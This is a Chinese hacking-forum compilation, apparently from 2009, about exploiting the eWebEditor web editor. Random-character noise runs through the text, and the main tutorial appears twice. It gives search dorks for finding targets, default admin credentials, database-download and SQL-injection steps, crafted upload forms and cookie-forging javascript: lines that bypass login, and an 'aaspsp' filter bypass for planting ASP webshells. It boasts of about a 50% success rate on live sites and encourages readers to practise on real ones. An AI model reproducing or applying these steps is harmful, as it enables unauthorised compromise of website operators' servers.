eWebEditor.asp?id=45&style=standard1 样式调用
# ]5 w: ]" A2 M& ?4 n0 [( n- [) y! T1 R
; m* i% C. R2 ~/edit/admin_uploadfile.asp?id=14&dir=../../..
4 `7 I( H2 I9 R' p+ x2 q1 ^7 ^0 B可以浏览网站目录 ../自己加或者减
; L8 r- R+ Z- R5 z- H
& b1 d1 ]! X6 K有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞$ A- E+ p1 x9 C( |/ @6 z% ?
简单利用就是
9 I0 S) z: `/ g9 d; uhttp://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200: y1 v, X( t- g ?
http://www.siqinci.com/ewebedito ... amp;style=full_v200
6 | J8 n: w8 d; O可以利用nbsi进行猜解,对此进行注入
; m' \0 t6 @1 t1 G还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
O! h& J3 h5 w9 z1 H6 k这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:2 n: D& Z3 i2 u' f, u! r* Q
在action下面
1 A4 V6 P3 x s8 e<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">
) W) ~5 F# I5 E: a<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">+ T( \7 n. }+ k4 K5 J4 h* Y
<input type="submit" name="uploadfile" value="提交">2 j3 z/ K! r1 H! V6 E7 N M
<input type=hidden name=originalfile value="">7 X; {' i/ `4 s$ f( z- l
</form>- x6 K; Y2 Q8 k6 F3 N/ ?2 n
------------------------------------------------------------------------------------------------------------------------------------------------
L6 Z/ [4 d9 J$ C" U; v" U<input type="submit" name="uploadfile" value="提交"> 放在action后头, h9 M6 E4 J1 V5 s+ G7 N4 y
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。/ u2 ?+ s4 {8 v) Q! m: ?& z! \! j
. p- e' S! ^2 M7 p8 B- V
" j' i* `3 F( Z5 q& _5 P2 W7 N& I
1 w" A5 g7 v7 @9 d: n+ Q* y3 a. F) U6 A- X$ Z& Q! ?+ t+ F
Ewebeditor最新漏洞及漏洞大全[收集] (图)
. K3 M' _, i+ m0 l! @3 H" H本帖最后由 administrator 于 2009-7-7 21:24 编辑
' O4 Z! {, Y+ U9 N; G, H0 z1 U# ?" C2 Z U
以下文章收集转载于网络
2 p( ]3 ^3 j0 M3 q2 u3 F& H#主题描述# ewebeditor 3.8漏洞[php]- G A3 }% n4 k3 S% S3 p/ [2 e
--------------------------------------------------------------------------------------------
& ]9 _+ B5 k( v2 T: \#内容#
; k% Z( B4 y) j# s vphp版ewebeditor 3.8的漏洞
: k$ @* @; p3 Lphp版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
5 e4 O+ \ {: t6 L: r5 {# [* R1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,% t& X/ p) R- S4 ^3 N
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了 k1 {1 S& p) O& x { o. j( t
3 后面的利用和asp一样,新增样式修改上传,就ok了" D, q9 |$ F* K$ F
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)/ ^) |: I X- G
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
9 y# ~% O* c2 L: b$ rjsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
6 R1 Z$ x' W5 o" \6 N# D--------------------------------------------------------------------------------------------
$ s& D7 O" h5 ?( _7 G- c+ G" L# {$ v; C _: }1 h7 B
6 s4 Y( ~7 j- [. g* Q$ `# e算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。6 G2 H6 l- g! b9 a
8 i, w# x+ q |; o1 z# L% ] ]漏洞更新日期TM: 2009 2 9日 转自zake’S Blog' X- E4 C7 c) B
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
, y! Y0 ]5 l9 W! V那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址0 W; r6 S% H, l( R# U& N8 d' S
$ o t/ t) g/ J3 @; g) t. p4 n2 j
1 `+ i# x- k! E! S* |然后确定以后,这里是最关键的一部!, U5 O3 r4 w/ T
这里点了远程上传以后,再提交得到木马地址7 Y, E+ e+ [; _) k& p
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限/ Y: u* ?( Y# J0 D% Z
属于安全检测漏洞版本ewebeditor v6.0.0: v- A) `( H! Y' C4 C* e
d' F( p P) K- @4 z) r8 m* x7 d以前的ewebeditor漏洞:
1 O' J4 i8 ?4 Z$ _- [8 o" Z
/ z% V8 R8 h. K) a: D( X& xewebeditor注入漏洞
$ C3 M; k. d D: a, w6 i
0 o& S8 ~* |8 c, n大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb8 j! M; H. ~+ I3 U, `
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
; O- B% e! f6 ~. P# o: y今天我给大家带来的也是ewebeditor编辑器的入侵方法
, J1 o& g! n2 ?/ j不过一种是注入,一种是利用upload.asp文件,本地构造
9 J6 @5 y: C7 @NO1:注入( E( l" C9 F+ _6 ~
http://www.XXX.com/ewebeditor200 ... amp;style=full_v200
; g+ o1 N$ q2 r" ^2 h1 W" W编辑器ewebedior7以前版本通通存在注入
+ e1 ~# H; d1 H3 M- u0 c直接检测不行的,要写入特征字符
% s+ P( b4 S1 Q! Q" k1 k我们的工具是不知道ewebeditor的表名的还有列名
) q; p! d/ t. A f9 l# T t我们自己去看看
% }6 h: J! c: y3 B哎。。先表吧
0 ?! t8 l4 Q6 a3 [6 S要先添加进库
" B. x/ T2 @5 h+ _开始猜账号密码了5 f; \2 z5 m, g e2 M* V4 Y! U
我们==4 k( e8 W1 i+ g" {" Y, Z) R
心急的往后拉$ l) p0 x+ i7 F! G; {; b2 W
出来了
1 e+ e; O8 U0 N; l9 T( k[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120
- y ^( d1 ~& J6 n! O3 k! s9 ^对吧^_^
! J; I+ M6 Z% Q( e* F, R5 G后面不说了3 d" y( V. @0 D# x+ c5 M z- g
NO2:利用upload.asp文件,本地构造上传shell
: Z( V6 p. C* C; ~+ e- H8 m: W大家看这里
$ k; x4 S I, b+ x% x) thttp://www.siqinci.com/ewebedito ... lepreview&id=37
- |& T4 U @" Z. j7 ~4 r6 u* f( s( {如果遇见这样的情况又无法添加工具栏是不是很郁闷: f* P2 ~! h0 q- Q) }5 z) A# S/ k
现在不郁闷了,^_^源源不一般/ ?; N7 O( r: j, s5 [6 e
我们记录下他的样式名“aaa”+ I- z7 c2 x: R2 K6 C
我已经吧upload.asp文件拿出来了
$ d! D/ V! v3 l8 `. X4 C( k我们构造下! v F4 H+ s* J6 q( F* Q
OK,我之前已经构造好了
L5 ?1 q9 O& c# }7 u9 h/ D& F其实就是这里( j7 K8 c4 G) l& M ^
<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>4 e2 |: y1 A0 P, @4 q: D
<input type=file name=uploadfile size=1 style=”width:100%”>' I) I' _) X" z+ M0 s8 g
<input type=submit value=”上传了”></input>& `2 Y; _2 L0 b* G
</form>
( k7 j% O+ I, o! H8 f: T下面我们运行他上传个大马算了
- T( x+ {. D$ I4 @; q* U: VUploadFile上传进去的在这个目录下0 p. a0 t" T+ e1 ?. f2 l+ |3 Z
2008102018020762.asa& n9 a, ^( |: Q% T1 y
4 l4 j- L/ V& ?6 L8 W
过往漏洞:7 ^5 N; ^, k6 j4 ?: S2 X
% a1 j8 ^4 B) ^& E; B& `/ e4 }) x5 M
首先介绍编辑器的一些默认特征:
2 I9 {+ j$ h' r- G1 j6 u; m5 }默认登陆admin_login.asp
; q. |2 W# M: L) M. Y默认数据库db/ewebeditor.mdb& F4 r+ f, m* k! \- q" Q
默认帐号admin 密码admin或admin888
! L# o+ z, D" s5 J p搜索关键字:”inurl:ewebeditor” 关键字十分重要) |. N$ t9 {5 Q2 ~
有人搜索”eWebEditor - eWebSoft在线编辑器”* E V3 s1 F& |7 N
根本搜索不到几个~' o$ }. J# ^3 V; v7 D( U
baidu.google搜索inurl:ewebeditor
$ ?! T: r$ y% Z% U, t* L几万的站起码有几千个是具有默认特征的~: r8 p" L9 G: ^
那么试一下默认后台
3 V. Z4 s2 W, k8 Hhttp://www.xxx.com.cn/admin/ewebeditor/admin_login.asp! }- D3 I+ O, X) C. u9 |6 `: j
试默认帐号密码登陆。
3 x& e5 Y$ w# c o+ v7 v* y利用eWebEditor获得WebShell的步骤大致如下: } O2 V- @( w+ }& H3 {, q
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
( F) v% E( D H4 Z4 B7 R% M2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
: P9 k G$ R. W6 U+ y2 D3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。) r- {9 U; S3 F: t
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
: b7 u, Q( k/ O3 l4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
5 W! }& s4 j7 n9 p# \' C' q$ U然后在上传的文件类型中增加“asa”类型。
- Q' G7 C. z+ |6 W: q% _% D* {% C5 M; E5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。3 n5 E$ n$ h: i1 I( p8 Y
漏洞原理
0 l6 b+ F7 A6 U5 L$ x漏洞的利用原理很简单,请看Upload.asp文件:
+ M F+ U1 h! x- ~1 j2 P. _# ]0 f任何情况下都不允许上传asp脚本文件
# X# x9 D2 B5 gsAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)$ r. L4 g7 _7 Y; Q; r) s
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!* \" o! ~; z" p
高级应用8 f3 }. H) i7 I$ q9 G0 J; q( N
eWebEditor的漏洞利用还有一些技巧:* }. k6 i/ L d& K; D. T9 N0 s+ ?0 g
1.使用默认用户名和密码无法登录。
5 d4 n% ?- E J% c7 j: i0 `请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
4 F' w9 B9 ~, J) M- i7 m* X' H2.加了asa类型后发现还是无法上传。7 L7 N/ O3 o4 q* Z/ `
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:5 @ G; l- a' }$ R
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”). Z) g! U; Z) V6 | j" h! B: [+ c
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。2 p; f( v/ C+ e+ d% ~
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
' T/ l/ {$ h' N+ l& ]8 {+ p& F呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
& ?/ L7 r2 M' |* G, L4.已经使用了第2点中的方法,但是asp类型还是无法上传。$ O3 \6 B8 o( u. R7 U1 C
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。" A5 g/ s6 p+ L
后记
' Z6 V9 H+ s: R根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!# x4 Y( W7 y! U4 b
基本入侵基础漏洞9 Y, s K- `3 k+ ~" C
eWebEditor 漏洞
j8 t% y# c0 [) K# g1 @; P9 v
1 {" |9 ]! q0 n9 u+ c m各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! & z/ }( B, K& D% B0 A
4 E E- X4 h( E* K. V* v
漏洞利用1 i! ?' r9 i! F8 Z
利用eWebEditor获得WebShell的步骤大致如下:
" a1 u- Q6 w# P# W- }; l3 b" ^1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
. _9 K9 q. N* }3 r: @& @- X+ v2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。
/ m( k' E& g, ?4 `; e W3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。 ~. U* b, I/ p4 Z" h' ^4 _ x$ i- Q0 s
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
6 P4 }7 P/ [3 x7 g: s4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。" ~3 G5 I! r+ H* V$ u/ N
b* v8 I; z+ j6 {/ ]
然后在上传的文件类型中增加“asa”类型。2 | L8 X! Y" u# O3 L( \3 Y9 R
0 H# w+ o; R0 y% k( \9 ~) [5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
b& r/ c6 S) g: L! g! t4 [& Q4 w* [# t; H% a6 t
3 @! U! q+ @7 `1 \" h: J. Y8 x
漏洞原理- ^. G- ^1 E' K
漏洞的利用原理很简单,请看Upload.asp文件:
. q: w3 {' ~: |3 W% O+ N1 L任何情况下都不允许上传asp脚本文件
' c4 W" n4 l" J0 W) X! n8 ]1 g, Y' VsAllowExt = replace(UCase(sAllowExt), "ASP", "")/ J F& O- S8 n' z; U: N7 l
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
! {; o( q9 e( O
8 h2 M; t2 S5 } d4 O% Q高级应用- Q8 N8 x. z; [: s1 x# z5 Q
eWebEditor的漏洞利用还有一些技巧:3 r" Z! e& U& g' v3 I" O* M$ z$ a+ {
1.使用默认用户名和密码无法登录。
1 r6 g6 f0 d3 Q* ?/ @3 p h请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。 R1 X. h5 D7 r7 Q2 y
2.加了asa类型后发现还是无法上传。
% T) L. ` {% Y/ W% o t( D应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
, u1 X/ W- ~( LsAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", ""). b+ |" x3 |: r. K2 q
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。4 `/ y8 p( X3 k: t
3.上传了asp文件后,却发现该目录没有运行脚本的权限。 _0 D! n! u; F
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。$ ]. f* r0 n1 E9 u9 X9 f
4.已经使用了第2点中的方法,但是asp类型还是无法上传。8 }( H: K+ m" G" N
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。& r0 V0 \# z) Z5 B
; \: q+ l6 y9 S* ~1 e" i; h' V后记: u U- @5 d5 i% [! c/ ^
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |